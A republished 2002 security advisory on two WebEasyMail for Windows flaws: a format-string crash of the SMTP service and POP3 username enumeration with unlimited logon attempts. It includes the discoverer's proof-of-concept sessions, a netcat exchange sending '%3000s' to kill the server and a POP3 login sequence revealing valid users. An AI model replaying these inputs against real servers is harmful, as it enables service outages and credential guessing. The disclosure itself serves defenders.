Multiple Vulnerabilities in WebEasyMail for Windows

Reported August 20, 2002, by Stan Bubrouski.

VERSION AFFECTED

 

·         WebEasyMail for Windows 3.4.2.2 and earlier versions

 

DESCRIPTION

 

Two vulnerabilities exist in WebEasyMail for Windows 3.4.2.2 and earlier versions that can result in a Denial of Service (DoS) condition and information disclosure. The DoS condition results when an attacker sends specially crafted format strings as input, such as the “printf” family of functions, resulting in the service terminating without an error message. The information disclosure vulnerability lets an attacker obtain a valid username and password on the vulnerable system. By default, an attacker can make unlimited logon attempts without the server terminating the connection. If the attacker gives a wrong password, the server responds with "-ERR invalid username" if the user doesn't exist and responds with "-ERR wrong password for this user" if the user exists.

 

DEMONSTRATION

 

The discoverer posted the following scenarios as proof-of-concept:

 

For the DoS condition:

 

$ nc localhost 25

220 ESMTP on WebEasyMail \[3.4.2.2\] ready.  http://www.winwebmail.com

%2

502 Error: command not implemented

%2s

502 Error: command not implemented

%100s

502 Error: command not implemented

%3000s

\[emsrv.exe silently dies here\]

$

 

For the information disclosure vulnerability:

 

OK POP3 on WebEasyMail \[3.4.2.2\] ready.  http://www.winwebmail.com

user dog

+OK user accepted

pass dog

-ERR invalid username

user test

+OK user accepted

pass dog

-ERR wrong password for this user

 

VENDOR RESPONSE

The vendor, WebEasyMail, has been notified, but has not yet released a patch for this vulnerability.

 

CREDIT
Discovered by Stan Bubrouski.

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish